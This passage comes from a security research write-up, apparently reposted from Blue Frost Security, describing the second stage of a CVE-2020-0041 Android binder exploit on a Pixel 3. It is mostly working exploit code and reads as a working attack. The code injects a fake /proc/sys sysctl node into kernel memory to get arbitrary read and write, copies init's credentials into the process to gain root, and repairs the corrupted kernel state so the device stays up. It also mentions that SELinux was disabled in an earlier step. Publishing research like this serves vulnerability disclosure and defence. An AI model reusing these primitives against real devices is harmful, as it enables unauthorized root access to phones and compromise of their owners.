printf("[+] Second level entry: %lx -> next table at %lx\n", entry, next_tbl);

entry = read64(next_tbl);
uint64_t kaddr = phys_to_virt(((entry & 0xffffffffffff) >> 12) << 12);

*(uint64_t *)map = 0xdeadbeefbadc0ded;
if (read64(kaddr) != 0xdeadbeefbadc0ded) {
	printf("[!] Something went wrong resolving the address of our mapping\n");
	goto out;
}

Note that we needed to read the contents of memstart_addr in order to translate between physical addresses and the corresponding physmap addresses. In any case, after running this code we know that the data at 0x200000 in our process address space can also be found at kaddr in kernel land.
With this, we set up a new sysctl node as follows:

/* We found the insertion place, setup the node */
uint64_t node_kaddr = kaddr;
void *node_uaddr = map;

uint64_t tbl_header_kaddr = kaddr + 0x80;
void *tbl_header_uaddr = map + 0x80;

uint64_t ctl_table_kaddr = kaddr + 0x100;
ctl_table_uaddr = map + 0x100;

uint64_t procname_kaddr = kaddr + 0x200;
void *procname_uaddr = map + 0x200;

/* Setup rb_node */
*(uint64_t *)(node_uaddr + 0x00) = prev_node;        // parent = prev_node
*(uint64_t *)(node_uaddr + 0x08) = 0;                // right = null
*(uint64_t *)(node_uaddr + 0x10) = 0;                // left = null
*(uint64_t *)(node_uaddr + 0x18) = tbl_header_kaddr; // my_tbl_header

*(uint64_t *)(tbl_header_uaddr) = ctl_table_kaddr;
*(uint64_t *)(tbl_header_uaddr + 0x18) = 0;                     // unregistering
*(uint64_t *)(tbl_header_uaddr + 0x20) = 0;                     // ctl_table_arg
*(uint64_t *)(tbl_header_uaddr + 0x28) = sysctl_table_root;     // root
*(uint64_t *)(tbl_header_uaddr + 0x30) = sysctl_table_root;     // set
*(uint64_t *)(tbl_header_uaddr + 0x38) = sysctl_table_root + 8; // parent
*(uint64_t *)(tbl_header_uaddr + 0x40) = node_kaddr;            // node
*(uint64_t *)(tbl_header_uaddr + 0x48) = 0;                     // inodes.first

/* Now setup ctl_table */
uint64_t proc_douintvec = kernel_base + PROC_DOUINTVEC_OFFSET;
*(uint64_t *)(ctl_table_uaddr) = procname_kaddr;        // procname
*(uint64_t *)(ctl_table_uaddr + 8) = kernel_base;       // data == what to read/write
*(uint32_t *)(ctl_table_uaddr + 16) = 0x8;              // max size
*(uint64_t *)(ctl_table_uaddr + 0x20) = proc_douintvec; // proc_handler
*(uint32_t *)(ctl_table_uaddr + 20) = 0666;             // mode = rw-rw-rw-

/*
 * Compute and write the node name. We use a random name starting with aaa
 * for two reasons:
 *
 * - It must be the first node in the tree alphabetically, given where we
 *   insert it (hence aaa...).
 *
 * - If we already ran, there's a cached dentry for each name we used
 *   earlier, which has dangling pointers but is only reachable through
 *   path lookup. If we reused the name, we'd crash using this dangling
 *   pointer at open time.
 *
 * It's easier to have a unique enough name than to figure out how to
 * clear the cache, which would be the cleaner solution here.
 */
int fd = open("/dev/urandom", O_RDONLY);
uint32_t rnd;
read(fd, &rnd, sizeof(rnd));
sprintf(procname_uaddr, "aaa_%x", rnd);
sprintf(pathname, "/proc/sys/%s", procname_uaddr);

/* And finally use a write8 to inject this new sysctl node */
struct exp_node *write8_sysctl = node_new("write8_sysctl");
node_write8(write8_sysctl, kaddr, prev_node + 16);

This basically creates a file at /proc/sys/aaa_[random] with read/write permissions, using proc_douintvec to handle reads and writes. This function takes the data field as the pointer to read from or write to, and allows up to maxlen bytes to be read or written as unsigned integers. With this, we can set up a write primitive as follows:

void write64(uint64_t addr, uint64_t value)
{
	*(uint64_t *)(ctl_table_uaddr + 8) = addr; // data == what to read/write
	*(uint32_t *)(ctl_table_uaddr + 16) = 0x8;

	char buf[100];
	int fd = open(pathname, O_WRONLY);
	if (fd < 0) {
		printf("[!] Failed to open. Errno: %d\n", errno);
	}
	sprintf(buf, "%u %u\n", (uint32_t)value, (uint32_t)(value >> 32));
	int ret = write(fd, buf, strlen(buf));
	if (ret < 0)
		printf("[!]
 Failed to write, errno: %d\n", errno);
	close(fd);
}

void write32(uint64_t addr, uint32_t value)
{
	*(uint64_t *)(ctl_table_uaddr + 8) = addr; // data == what to read/write
	*(uint32_t *)(ctl_table_uaddr + 16) = 4;

	char buf[100];
	int fd = open(pathname, O_WRONLY);
	sprintf(buf, "%u\n", value);
	write(fd, buf, strlen(buf));
	close(fd);
}

Getting root and cleaning up

Once we have read/write capabilities on a Pixel phone, obtaining root access is as simple as copying the credentials from a root task. Since we already disabled SELinux earlier, we just need to find the init credentials, bump their reference count and copy them to our process like this:

/* Set refcount to 0x100 and set our own credentials to init's */
write32(init_cred, 0x100);
write64(current + REAL_CRED_OFFSET, init_cred);
write64(current + REAL_CRED_OFFSET + 8, init_cred);

if (getuid() != 0) {
	printf("[!!] Something went wrong, we're not root!!\n");
	goto out;
}

However, this is not enough to enjoy a root shell yet, since we have corrupted quite some memory in kernel land, and things will break as soon as we exit the current process and execute the shell. There are a few things that we need to repair:

- The binder_node structures we used to perform write primitives were reallocated through sendmsg, but have been freed again when performing the write. We need to make sure the corresponding threads do not free these objects again upon returning from sendmsg. For that, we parse the thread stacks and replace any references we find to these nodes with ZERO_SIZE_PTR.
- We have modified the f_inode of a struct file, which now points into the middle of an epitem. The easiest way around this is to simply bump the reference count of this file so that release is never called on it.
- While setting up the read primitive, we also corrupted a field in the epitem itself. This field was a linked list with one epitem only, so we can just copy the fllink.prev field on top of fllink.next to restore the list.
- We also added a fake entry to /proc/sys, which we could leave around ... but in that case it would point to pages that belonged to our exploit and have since been recycled by the kernel. We decided to just remove it from the rb-tree. Note that this makes the entry disappear from the userland view, but there is still a cached path in the kernel. Since we used a randomized name, chances are small that anybody will try to access it in the future by opening it directly.

After cleaning up all this mess, we can finally execute our root shell and enjoy uid 0 without crashing the phone.

Demonstration video

The following video shows the process of rooting the phone from an adb shell using the exploit we just described:

Code

You can find the code for the exploits described in this and the previous post at the Blue Frost Security GitHub. The exploit has only been tested on a Pixel 3 phone running the February 2020 firmware, and would need to be adapted for other firmware versions. In particular, a number of kernel offsets are used in the exploit, as well as structure offsets that may vary between kernel versions.

Sursa: https://labs.bluefrostsecurity.de/blog/2020/04/08/cve-2020-0041-part-2-escalating-to-root/